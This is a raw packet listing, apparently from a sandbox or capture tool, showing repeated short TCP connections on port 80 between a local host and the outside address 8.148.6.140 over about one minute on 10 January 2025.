        Jan 10, 2025 09:27:39.059613943 CET4975480192.168.2.88.148.6.140
        Jan 10, 2025 09:27:39.060409069 CET4975480192.168.2.88.148.6.140
        Jan 10, 2025 09:27:39.065154076 CET80497548.148.6.140192.168.2.8
        Jan 10, 2025 09:27:39.977606058 CET80497548.148.6.140192.168.2.8
        Jan 10, 2025 09:27:39.977668047 CET4975480192.168.2.88.148.6.140
        Jan 10, 2025 09:27:39.977765083 CET4975480192.168.2.88.148.6.140
        Jan 10, 2025 09:27:39.982516050 CET80497548.148.6.140192.168.2.8
        Jan 10, 2025 09:27:40.087924004 CET4975580192.168.2.88.148.6.140
        Jan 10, 2025 09:27:40.092791080 CET80497558.148.6.140192.168.2.8
        Jan 10, 2025 09:27:40.092911005 CET4975580192.168.2.88.148.6.140
        Jan 10, 2025 09:27:40.093089104 CET4975580192.168.2.88.148.6.140
        Jan 10, 2025 09:27:40.098252058 CET80497558.148.6.140192.168.2.8
        Jan 10, 2025 09:27:44.141128063 CET4975580192.168.2.88.148.6.140
        Jan 10, 2025 09:27:44.265811920 CET4975680192.168.2.88.148.6.140
        Jan 10, 2025 09:27:44.270770073 CET80497568.148.6.140192.168.2.8
        Jan 10, 2025 09:27:44.270844936 CET4975680192.168.2.88.148.6.140
        Jan 10, 2025 09:27:44.271183014 CET4975680192.168.2.88.148.6.140
        Jan 10, 2025 09:27:44.276021004 CET80497568.148.6.140192.168.2.8
        Jan 10, 2025 09:27:45.138668060 CET80497568.148.6.140192.168.2.8
        Jan 10, 2025 09:27:45.138740063 CET4975680192.168.2.88.148.6.140
        Jan 10, 2025 09:27:45.138806105 CET4975680192.168.2.88.148.6.140
        Jan 10, 2025 09:27:45.146426916 CET80497568.148.6.140192.168.2.8
        Jan 10, 2025 09:27:45.245218039 CET4975780192.168.2.88.148.6.140
        Jan 10, 2025 09:27:45.250144958 CET80497578.148.6.140192.168.2.8
        Jan 10, 2025 09:27:45.253863096 CET4975780192.168.2.88.148.6.140
        Jan 10, 2025 09:27:45.254055977 CET4975780192.168.2.88.148.6.140
        Jan 10, 2025 09:27:45.258889914 CET80497578.148.6.140192.168.2.8
        Jan 10, 2025 09:27:49.239269972 CET80497578.148.6.140192.168.2.8
        Jan 10, 2025 09:27:49.239497900 CET80497578.148.6.140192.168.2.8
        Jan 10, 2025 09:27:49.239502907 CET4975780192.168.2.88.148.6.140
        Jan 10, 2025 09:27:49.239619017 CET4975780192.168.2.88.148.6.140
        Jan 10, 2025 09:27:49.239888906 CET80497578.148.6.140192.168.2.8
        Jan 10, 2025 09:27:49.240228891 CET4975780192.168.2.88.148.6.140
        Jan 10, 2025 09:27:49.390765905 CET4975780192.168.2.88.148.6.140
        Jan 10, 2025 09:27:49.391252041 CET4975880192.168.2.88.148.6.140
        Jan 10, 2025 09:27:49.395663977 CET80497578.148.6.140192.168.2.8
        Jan 10, 2025 09:27:49.396239042 CET80497588.148.6.140192.168.2.8
        Jan 10, 2025 09:27:49.396404028 CET4975880192.168.2.88.148.6.140
        Jan 10, 2025 09:27:49.398039103 CET4975880192.168.2.88.148.6.140
        Jan 10, 2025 09:27:49.403338909 CET80497588.148.6.140192.168.2.8
        Jan 10, 2025 09:27:50.366084099 CET80497588.148.6.140192.168.2.8
        Jan 10, 2025 09:27:50.366163969 CET80497588.148.6.140192.168.2.8
        Jan 10, 2025 09:27:50.366228104 CET80497588.148.6.140192.168.2.8
        Jan 10, 2025 09:27:50.366314888 CET4975880192.168.2.88.148.6.140
        Jan 10, 2025 09:27:50.366314888 CET4975880192.168.2.88.148.6.140
        Jan 10, 2025 09:27:50.366611958 CET4975880192.168.2.88.148.6.140
        Jan 10, 2025 09:27:50.371485949 CET80497588.148.6.140192.168.2.8
        Jan 10, 2025 09:27:50.483056068 CET4975980192.168.2.88.148.6.140
        Jan 10, 2025 09:27:50.487951994 CET80497598.148.6.140192.168.2.8
        Jan 10, 2025 09:27:50.491117001 CET4975980192.168.2.88.148.6.140
        Jan 10, 2025 09:27:50.495047092 CET4975980192.168.2.88.148.6.140
        Jan 10, 2025 09:27:50.499937057 CET80497598.148.6.140192.168.2.8
        Jan 10, 2025 09:27:51.363193035 CET80497598.148.6.140192.168.2.8
        Jan 10, 2025 09:27:51.363270044 CET4975980192.168.2.88.148.6.140
        Jan 10, 2025 09:27:51.363534927 CET4975980192.168.2.88.148.6.140
        Jan 10, 2025 09:27:51.368283987 CET80497598.148.6.140192.168.2.8
        Jan 10, 2025 09:27:51.531559944 CET4976080192.168.2.88.148.6.140
        Jan 10, 2025 09:27:51.536392927 CET80497608.148.6.140192.168.2.8
        Jan 10, 2025 09:27:51.536511898 CET4976080192.168.2.88.148.6.140
        Jan 10, 2025 09:27:51.537247896 CET4976080192.168.2.88.148.6.140
        Jan 10, 2025 09:27:51.542049885 CET80497608.148.6.140192.168.2.8
        Jan 10, 2025 09:27:53.160536051 CET80497608.148.6.140192.168.2.8
        Jan 10, 2025 09:27:53.160696983 CET80497608.148.6.140192.168.2.8
        Jan 10, 2025 09:27:53.160768986 CET4976080192.168.2.88.148.6.140
        Jan 10, 2025 09:27:53.160872936 CET4976080192.168.2.88.148.6.140
        Jan 10, 2025 09:27:53.276994944 CET4976080192.168.2.88.148.6.140
        Jan 10, 2025 09:27:53.277295113 CET4976180192.168.2.88.148.6.140
        Jan 10, 2025 09:27:53.281805992 CET80497608.148.6.140192.168.2.8
        Jan 10, 2025 09:27:53.282749891 CET80497618.148.6.140192.168.2.8
        Jan 10, 2025 09:27:53.282815933 CET4976180192.168.2.88.148.6.140
        Jan 10, 2025 09:27:53.283620119 CET4976180192.168.2.88.148.6.140
        Jan 10, 2025 09:27:53.288517952 CET80497618.148.6.140192.168.2.8
        Jan 10, 2025 09:27:54.252041101 CET80497618.148.6.140192.168.2.8
        Jan 10, 2025 09:27:54.252070904 CET80497618.148.6.140192.168.2.8
        Jan 10, 2025 09:27:54.252274990 CET4976180192.168.2.88.148.6.140
        Jan 10, 2025 09:27:54.252274990 CET4976180192.168.2.88.148.6.140
        Jan 10, 2025 09:27:54.257092953 CET80497618.148.6.140192.168.2.8
        Jan 10, 2025 09:27:54.371046066 CET4976280192.168.2.88.148.6.140
        Jan 10, 2025 09:27:54.375880003 CET80497628.148.6.140192.168.2.8
        Jan 10, 2025 09:27:54.378376961 CET4976280192.168.2.88.148.6.140
        Jan 10, 2025 09:27:54.378495932 CET4976280192.168.2.88.148.6.140
        Jan 10, 2025 09:27:54.383256912 CET80497628.148.6.140192.168.2.8
        Jan 10, 2025 09:27:55.357736111 CET80497628.148.6.140192.168.2.8
        Jan 10, 2025 09:27:55.357795000 CET4976280192.168.2.88.148.6.140
        Jan 10, 2025 09:27:55.357903957 CET80497628.148.6.140192.168.2.8
        Jan 10, 2025 09:27:55.357959032 CET4976280192.168.2.88.148.6.140
        Jan 10, 2025 09:27:55.358038902 CET80497628.148.6.140192.168.2.8
        Jan 10, 2025 09:27:55.358091116 CET4976280192.168.2.88.148.6.140
        Jan 10, 2025 09:27:55.372426987 CET4976280192.168.2.88.148.6.140
        Jan 10, 2025 09:27:55.377285957 CET80497628.148.6.140192.168.2.8
        Jan 10, 2025 09:27:55.577739000 CET4976380192.168.2.88.148.6.140
        Jan 10, 2025 09:27:55.582652092 CET80497638.148.6.140192.168.2.8
        Jan 10, 2025 09:27:55.582712889 CET4976380192.168.2.88.148.6.140
        Jan 10, 2025 09:27:55.584167957 CET4976380192.168.2.88.148.6.140
        Jan 10, 2025 09:27:55.588977098 CET80497638.148.6.140192.168.2.8
        Jan 10, 2025 09:27:56.448012114 CET80497638.148.6.140192.168.2.8
        Jan 10, 2025 09:27:56.448630095 CET4976380192.168.2.88.148.6.140
        Jan 10, 2025 09:27:56.448765993 CET4976380192.168.2.88.148.6.140
        Jan 10, 2025 09:27:56.454062939 CET80497638.148.6.140192.168.2.8
        Jan 10, 2025 09:27:56.559211969 CET4976480192.168.2.88.148.6.140
        Jan 10, 2025 09:27:56.564071894 CET80497648.148.6.140192.168.2.8
        Jan 10, 2025 09:27:56.564357996 CET4976480192.168.2.88.148.6.140
        Jan 10, 2025 09:27:56.564357996 CET4976480192.168.2.88.148.6.140
        Jan 10, 2025 09:27:56.569214106 CET80497648.148.6.140192.168.2.8
        Jan 10, 2025 09:27:57.414078951 CET80497648.148.6.140192.168.2.8
        Jan 10, 2025 09:27:57.414220095 CET4976480192.168.2.88.148.6.140
        Jan 10, 2025 09:27:57.414220095 CET4976480192.168.2.88.148.6.140
        Jan 10, 2025 09:27:57.419122934 CET80497648.148.6.140192.168.2.8
        Jan 10, 2025 09:27:57.525705099 CET4976580192.168.2.88.148.6.140
        Jan 10, 2025 09:27:57.530535936 CET80497658.148.6.140192.168.2.8
        Jan 10, 2025 09:27:57.530603886 CET4976580192.168.2.88.148.6.140
        Jan 10, 2025 09:27:57.530797958 CET4976580192.168.2.88.148.6.140
        Jan 10, 2025 09:27:57.535563946 CET80497658.148.6.140192.168.2.8
        Jan 10, 2025 09:27:58.380248070 CET80497658.148.6.140192.168.2.8
        Jan 10, 2025 09:27:58.383178949 CET4976580192.168.2.88.148.6.140
        Jan 10, 2025 09:27:58.387428045 CET4976580192.168.2.88.148.6.140
        Jan 10, 2025 09:27:58.392199993 CET80497658.148.6.140192.168.2.8
        Jan 10, 2025 09:27:58.495043993 CET4976680192.168.2.88.148.6.140
        Jan 10, 2025 09:27:58.499938965 CET80497668.148.6.140192.168.2.8
        Jan 10, 2025 09:27:58.503158092 CET4976680192.168.2.88.148.6.140
        Jan 10, 2025 09:27:58.503348112 CET4976680192.168.2.88.148.6.140
        Jan 10, 2025 09:27:58.508106947 CET80497668.148.6.140192.168.2.8
        Jan 10, 2025 09:28:00.135533094 CET80497668.148.6.140192.168.2.8
        Jan 10, 2025 09:28:00.135601997 CET4976680192.168.2.88.148.6.140
        Jan 10, 2025 09:28:00.135694981 CET80497668.148.6.140192.168.2.8
        Jan 10, 2025 09:28:00.135746956 CET4976680192.168.2.88.148.6.140
        Jan 10, 2025 09:28:00.142941952 CET4976680192.168.2.88.148.6.140
        Jan 10, 2025 09:28:00.147703886 CET80497668.148.6.140192.168.2.8
        Jan 10, 2025 09:28:00.294397116 CET4976780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:00.299325943 CET80497678.148.6.140192.168.2.8
        Jan 10, 2025 09:28:00.301789045 CET4976780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:00.305979013 CET4976780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:00.310795069 CET80497678.148.6.140192.168.2.8
        Jan 10, 2025 09:28:01.135138035 CET80497678.148.6.140192.168.2.8
        Jan 10, 2025 09:28:01.135430098 CET4976780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:01.139045000 CET4976780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:01.143873930 CET80497678.148.6.140192.168.2.8
        Jan 10, 2025 09:28:01.246675968 CET4976880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:01.251579046 CET80497688.148.6.140192.168.2.8
        Jan 10, 2025 09:28:01.251655102 CET4976880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:01.252206087 CET4976880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:01.256999016 CET80497688.148.6.140192.168.2.8
        Jan 10, 2025 09:28:05.258651018 CET4976880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:05.370493889 CET4976980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:05.376724958 CET80497698.148.6.140192.168.2.8
        Jan 10, 2025 09:28:05.376811028 CET4976980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:05.376934052 CET4976980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:05.382988930 CET80497698.148.6.140192.168.2.8
        Jan 10, 2025 09:28:06.357059002 CET80497698.148.6.140192.168.2.8
        Jan 10, 2025 09:28:06.357196093 CET80497698.148.6.140192.168.2.8
        Jan 10, 2025 09:28:06.357269049 CET4976980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:06.357373953 CET4976980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:06.357373953 CET4976980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:06.362183094 CET80497698.148.6.140192.168.2.8
        Jan 10, 2025 09:28:06.463421106 CET4977080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:06.468287945 CET80497708.148.6.140192.168.2.8
        Jan 10, 2025 09:28:06.468466997 CET4977080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:06.468558073 CET4977080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:06.473304033 CET80497708.148.6.140192.168.2.8
        Jan 10, 2025 09:28:07.441239119 CET80497708.148.6.140192.168.2.8
        Jan 10, 2025 09:28:07.441298962 CET4977080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:07.441368103 CET4977080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:07.448574066 CET80497708.148.6.140192.168.2.8
        Jan 10, 2025 09:28:07.556643009 CET4977180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:07.561566114 CET80497718.148.6.140192.168.2.8
        Jan 10, 2025 09:28:07.561662912 CET4977180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:07.561825037 CET4977180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:07.566557884 CET80497718.148.6.140192.168.2.8
        Jan 10, 2025 09:28:08.570158958 CET80497718.148.6.140192.168.2.8
        Jan 10, 2025 09:28:08.570252895 CET80497718.148.6.140192.168.2.8
        Jan 10, 2025 09:28:08.570364952 CET4977180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:08.570588112 CET4977180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:08.575378895 CET80497718.148.6.140192.168.2.8
        Jan 10, 2025 09:28:08.691112041 CET4977280192.168.2.88.148.6.140
        Jan 10, 2025 09:28:08.696008921 CET80497728.148.6.140192.168.2.8
        Jan 10, 2025 09:28:08.696357012 CET4977280192.168.2.88.148.6.140
        Jan 10, 2025 09:28:08.702950954 CET4977280192.168.2.88.148.6.140
        Jan 10, 2025 09:28:08.707756996 CET80497728.148.6.140192.168.2.8
        Jan 10, 2025 09:28:10.308865070 CET80497728.148.6.140192.168.2.8
        Jan 10, 2025 09:28:10.308877945 CET80497728.148.6.140192.168.2.8
        Jan 10, 2025 09:28:10.309047937 CET4977280192.168.2.88.148.6.140
        Jan 10, 2025 09:28:10.309196949 CET4977280192.168.2.88.148.6.140
        Jan 10, 2025 09:28:10.313932896 CET80497728.148.6.140192.168.2.8
        Jan 10, 2025 09:28:10.419464111 CET4977380192.168.2.88.148.6.140
        Jan 10, 2025 09:28:10.424297094 CET80497738.148.6.140192.168.2.8
        Jan 10, 2025 09:28:10.424417973 CET4977380192.168.2.88.148.6.140
        Jan 10, 2025 09:28:10.424554110 CET4977380192.168.2.88.148.6.140
        Jan 10, 2025 09:28:10.429359913 CET80497738.148.6.140192.168.2.8
        Jan 10, 2025 09:28:11.395093918 CET80497738.148.6.140192.168.2.8
        Jan 10, 2025 09:28:11.395219088 CET80497738.148.6.140192.168.2.8
        Jan 10, 2025 09:28:11.395261049 CET4977380192.168.2.88.148.6.140
        Jan 10, 2025 09:28:11.395261049 CET4977380192.168.2.88.148.6.140
        Jan 10, 2025 09:28:11.395349026 CET4977380192.168.2.88.148.6.140
        Jan 10, 2025 09:28:11.400096893 CET80497738.148.6.140192.168.2.8
        Jan 10, 2025 09:28:11.509720087 CET4977480192.168.2.88.148.6.140
        Jan 10, 2025 09:28:11.514581919 CET80497748.148.6.140192.168.2.8
        Jan 10, 2025 09:28:11.514786959 CET4977480192.168.2.88.148.6.140
        Jan 10, 2025 09:28:11.514879942 CET4977480192.168.2.88.148.6.140
        Jan 10, 2025 09:28:11.519705057 CET80497748.148.6.140192.168.2.8
        Jan 10, 2025 09:28:12.393527031 CET80497748.148.6.140192.168.2.8
        Jan 10, 2025 09:28:12.394184113 CET4977480192.168.2.88.148.6.140
        Jan 10, 2025 09:28:12.394184113 CET4977480192.168.2.88.148.6.140
        Jan 10, 2025 09:28:12.399065971 CET80497748.148.6.140192.168.2.8
        Jan 10, 2025 09:28:12.509279966 CET4977580192.168.2.88.148.6.140
        Jan 10, 2025 09:28:12.514128923 CET80497758.148.6.140192.168.2.8
        Jan 10, 2025 09:28:12.517843962 CET4977580192.168.2.88.148.6.140
        Jan 10, 2025 09:28:12.517987013 CET4977580192.168.2.88.148.6.140
        Jan 10, 2025 09:28:12.522847891 CET80497758.148.6.140192.168.2.8
        Jan 10, 2025 09:28:13.377218962 CET80497758.148.6.140192.168.2.8
        Jan 10, 2025 09:28:13.377314091 CET4977580192.168.2.88.148.6.140
        Jan 10, 2025 09:28:13.377456903 CET4977580192.168.2.88.148.6.140
        Jan 10, 2025 09:28:13.382257938 CET80497758.148.6.140192.168.2.8
        Jan 10, 2025 09:28:13.525186062 CET4977680192.168.2.88.148.6.140
        Jan 10, 2025 09:28:13.530119896 CET80497768.148.6.140192.168.2.8
        Jan 10, 2025 09:28:13.530271053 CET4977680192.168.2.88.148.6.140
        Jan 10, 2025 09:28:13.533879995 CET4977680192.168.2.88.148.6.140
        Jan 10, 2025 09:28:13.538733959 CET80497768.148.6.140192.168.2.8
        Jan 10, 2025 09:28:15.103058100 CET80497768.148.6.140192.168.2.8
        Jan 10, 2025 09:28:15.103101969 CET80497768.148.6.140192.168.2.8
        Jan 10, 2025 09:28:15.103216887 CET4977680192.168.2.88.148.6.140
        Jan 10, 2025 09:28:15.111341000 CET4977680192.168.2.88.148.6.140
        Jan 10, 2025 09:28:15.116182089 CET80497768.148.6.140192.168.2.8
        Jan 10, 2025 09:28:15.277169943 CET4977780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:15.282109022 CET80497778.148.6.140192.168.2.8
        Jan 10, 2025 09:28:15.282186031 CET4977780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:15.282443047 CET4977780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:15.287189960 CET80497778.148.6.140192.168.2.8
        Jan 10, 2025 09:28:16.135530949 CET80497778.148.6.140192.168.2.8
        Jan 10, 2025 09:28:16.135607004 CET4977780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:16.135679007 CET4977780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:16.141787052 CET80497778.148.6.140192.168.2.8
        Jan 10, 2025 09:28:16.243829966 CET4977880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:16.250163078 CET80497788.148.6.140192.168.2.8
        Jan 10, 2025 09:28:16.250237942 CET4977880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:16.250392914 CET4977880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:16.257807016 CET80497788.148.6.140192.168.2.8
        Jan 10, 2025 09:28:17.234460115 CET80497788.148.6.140192.168.2.8
        Jan 10, 2025 09:28:17.234530926 CET80497788.148.6.140192.168.2.8
        Jan 10, 2025 09:28:17.234646082 CET4977880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:17.235090017 CET4977880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:17.239886999 CET80497788.148.6.140192.168.2.8
        Jan 10, 2025 09:28:17.365710974 CET4977980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:17.371249914 CET80497798.148.6.140192.168.2.8
        Jan 10, 2025 09:28:17.371318102 CET4977980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:17.374104023 CET4977980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:17.380055904 CET80497798.148.6.140192.168.2.8
        Jan 10, 2025 09:28:18.357980967 CET80497798.148.6.140192.168.2.8
        Jan 10, 2025 09:28:18.358108997 CET4977980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:18.358127117 CET80497798.148.6.140192.168.2.8
        Jan 10, 2025 09:28:18.358545065 CET4977980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:18.376506090 CET4977980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:18.381361008 CET80497798.148.6.140192.168.2.8
        Jan 10, 2025 09:28:18.494786024 CET4978080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:18.499577045 CET80497808.148.6.140192.168.2.8
        Jan 10, 2025 09:28:18.499675035 CET4978080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:18.499998093 CET4978080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:18.504731894 CET80497808.148.6.140192.168.2.8
        Jan 10, 2025 09:28:19.381582022 CET80497808.148.6.140192.168.2.8
        Jan 10, 2025 09:28:19.381900072 CET4978080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:19.389491081 CET4978080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:19.394319057 CET80497808.148.6.140192.168.2.8
        Jan 10, 2025 09:28:19.493524075 CET4978180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:19.498477936 CET80497818.148.6.140192.168.2.8
        Jan 10, 2025 09:28:19.498558998 CET4978180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:19.498692036 CET4978180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:19.503483057 CET80497818.148.6.140192.168.2.8
        Jan 10, 2025 09:28:20.465106010 CET80497818.148.6.140192.168.2.8
        Jan 10, 2025 09:28:20.465153933 CET4978180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:20.465231895 CET80497818.148.6.140192.168.2.8
        Jan 10, 2025 09:28:20.465270042 CET4978180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:20.465368986 CET4978180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:20.470086098 CET80497818.148.6.140192.168.2.8
        Jan 10, 2025 09:28:20.573942900 CET4978280192.168.2.88.148.6.140
        Jan 10, 2025 09:28:20.578768015 CET80497828.148.6.140192.168.2.8
        Jan 10, 2025 09:28:20.578839064 CET4978280192.168.2.88.148.6.140
        Jan 10, 2025 09:28:20.579029083 CET4978280192.168.2.88.148.6.140
        Jan 10, 2025 09:28:20.583755016 CET80497828.148.6.140192.168.2.8
        Jan 10, 2025 09:28:22.157716036 CET80497828.148.6.140192.168.2.8
        Jan 10, 2025 09:28:22.157814026 CET80497828.148.6.140192.168.2.8
        Jan 10, 2025 09:28:22.157970905 CET4978280192.168.2.88.148.6.140
        Jan 10, 2025 09:28:22.158041954 CET4978280192.168.2.88.148.6.140
        Jan 10, 2025 09:28:22.276433945 CET4978280192.168.2.88.148.6.140
        Jan 10, 2025 09:28:22.276654005 CET4978380192.168.2.88.148.6.140
        Jan 10, 2025 09:28:22.281251907 CET80497828.148.6.140192.168.2.8
        Jan 10, 2025 09:28:22.281547070 CET80497838.148.6.140192.168.2.8
        Jan 10, 2025 09:28:22.281639099 CET4978380192.168.2.88.148.6.140
        Jan 10, 2025 09:28:22.281745911 CET4978380192.168.2.88.148.6.140
        Jan 10, 2025 09:28:22.286516905 CET80497838.148.6.140192.168.2.8
        Jan 10, 2025 09:28:26.134670973 CET80497838.148.6.140192.168.2.8
        Jan 10, 2025 09:28:26.135147095 CET4978380192.168.2.88.148.6.140
        Jan 10, 2025 09:28:26.135615110 CET4978380192.168.2.88.148.6.140
        Jan 10, 2025 09:28:26.142590046 CET80497838.148.6.140192.168.2.8
        Jan 10, 2025 09:28:26.354263067 CET4978480192.168.2.88.148.6.140
        Jan 10, 2025 09:28:26.359287024 CET80497848.148.6.140192.168.2.8
        Jan 10, 2025 09:28:26.359364986 CET4978480192.168.2.88.148.6.140
        Jan 10, 2025 09:28:26.359558105 CET4978480192.168.2.88.148.6.140
        Jan 10, 2025 09:28:26.364357948 CET80497848.148.6.140192.168.2.8
        Jan 10, 2025 09:28:27.488347054 CET80497848.148.6.140192.168.2.8
        Jan 10, 2025 09:28:27.488414049 CET80497848.148.6.140192.168.2.8
        Jan 10, 2025 09:28:27.488445044 CET80497848.148.6.140192.168.2.8
        Jan 10, 2025 09:28:27.488451958 CET4978480192.168.2.88.148.6.140
        Jan 10, 2025 09:28:27.488492966 CET4978480192.168.2.88.148.6.140
        Jan 10, 2025 09:28:27.488615036 CET4978480192.168.2.88.148.6.140
        Jan 10, 2025 09:28:27.491940022 CET4978480192.168.2.88.148.6.140
        Jan 10, 2025 09:28:27.496790886 CET80497848.148.6.140192.168.2.8
        Jan 10, 2025 09:28:27.604176998 CET4978580192.168.2.88.148.6.140
        Jan 10, 2025 09:28:27.609119892 CET80497858.148.6.140192.168.2.8
        Jan 10, 2025 09:28:27.609263897 CET4978580192.168.2.88.148.6.140
        Jan 10, 2025 09:28:27.609723091 CET4978580192.168.2.88.148.6.140
        Jan 10, 2025 09:28:27.614521980 CET80497858.148.6.140192.168.2.8
        Jan 10, 2025 09:28:28.561388969 CET80497858.148.6.140192.168.2.8
        Jan 10, 2025 09:28:28.561471939 CET80497858.148.6.140192.168.2.8
        Jan 10, 2025 09:28:28.561470985 CET4978580192.168.2.88.148.6.140
        Jan 10, 2025 09:28:28.561552048 CET4978580192.168.2.88.148.6.140
        Jan 10, 2025 09:28:28.561583996 CET4978580192.168.2.88.148.6.140
        Jan 10, 2025 09:28:28.566490889 CET80497858.148.6.140192.168.2.8
        Jan 10, 2025 09:28:28.680939913 CET4978680192.168.2.88.148.6.140
        Jan 10, 2025 09:28:28.685867071 CET80497868.148.6.140192.168.2.8
        Jan 10, 2025 09:28:28.685954094 CET4978680192.168.2.88.148.6.140
        Jan 10, 2025 09:28:28.686072111 CET4978680192.168.2.88.148.6.140
        Jan 10, 2025 09:28:28.690891027 CET80497868.148.6.140192.168.2.8
        Jan 10, 2025 09:28:29.683609962 CET80497868.148.6.140192.168.2.8
        Jan 10, 2025 09:28:29.683644056 CET80497868.148.6.140192.168.2.8
        Jan 10, 2025 09:28:29.683708906 CET4978680192.168.2.88.148.6.140
        Jan 10, 2025 09:28:29.683708906 CET4978680192.168.2.88.148.6.140
        Jan 10, 2025 09:28:29.684035063 CET4978680192.168.2.88.148.6.140
        Jan 10, 2025 09:28:29.688860893 CET80497868.148.6.140192.168.2.8
        Jan 10, 2025 09:28:29.807002068 CET4978780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:29.811980963 CET80497878.148.6.140192.168.2.8
        Jan 10, 2025 09:28:29.812120914 CET4978780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:29.812395096 CET4978780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:29.817662954 CET80497878.148.6.140192.168.2.8
        Jan 10, 2025 09:28:30.808409929 CET80497878.148.6.140192.168.2.8
        Jan 10, 2025 09:28:30.808475971 CET4978780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:30.808528900 CET80497878.148.6.140192.168.2.8
        Jan 10, 2025 09:28:30.808581114 CET4978780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:30.808664083 CET4978780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:30.814682961 CET80497878.148.6.140192.168.2.8
        Jan 10, 2025 09:28:30.915838003 CET4978880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:30.921284914 CET80497888.148.6.140192.168.2.8
        Jan 10, 2025 09:28:30.921365023 CET4978880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:30.921494007 CET4978880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:30.926664114 CET80497888.148.6.140192.168.2.8
        Jan 10, 2025 09:28:31.773916960 CET80497888.148.6.140192.168.2.8
        Jan 10, 2025 09:28:31.773998022 CET4978880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:31.774084091 CET4978880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:31.779921055 CET80497888.148.6.140192.168.2.8
        Jan 10, 2025 09:28:31.884376049 CET4978980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:31.889261007 CET80497898.148.6.140192.168.2.8
        Jan 10, 2025 09:28:31.889424086 CET4978980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:31.889554977 CET4978980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:31.894366980 CET80497898.148.6.140192.168.2.8
        Jan 10, 2025 09:28:35.897260904 CET4978980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:36.008863926 CET4979080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:36.013727903 CET80497908.148.6.140192.168.2.8
        Jan 10, 2025 09:28:36.013813019 CET4979080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:36.013983965 CET4979080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:36.018774986 CET80497908.148.6.140192.168.2.8
        Jan 10, 2025 09:28:36.979285002 CET80497908.148.6.140192.168.2.8
        Jan 10, 2025 09:28:36.979358912 CET80497908.148.6.140192.168.2.8
        Jan 10, 2025 09:28:36.979387999 CET4979080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:36.979417086 CET80497908.148.6.140192.168.2.8
        Jan 10, 2025 09:28:36.979438066 CET4979080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:36.979582071 CET4979080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:36.979650974 CET4979080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:36.984580040 CET80497908.148.6.140192.168.2.8
        Jan 10, 2025 09:28:37.089170933 CET4979180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:37.094669104 CET80497918.148.6.140192.168.2.8
        Jan 10, 2025 09:28:37.097176075 CET4979180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:37.101083040 CET4979180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:37.106437922 CET80497918.148.6.140192.168.2.8
        Jan 10, 2025 09:28:38.083818913 CET80497918.148.6.140192.168.2.8
        Jan 10, 2025 09:28:38.083842039 CET80497918.148.6.140192.168.2.8
        Jan 10, 2025 09:28:38.083875895 CET4979180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:38.083911896 CET4979180192.168.2.88.148.6.140
